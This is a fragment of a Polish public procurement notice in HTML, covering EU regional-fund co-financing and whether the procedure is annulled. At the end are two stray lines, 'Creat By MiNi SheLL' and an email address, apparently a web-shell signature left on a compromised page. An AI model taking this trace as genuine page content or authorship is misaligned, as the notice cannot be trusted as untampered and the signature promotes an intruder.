<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com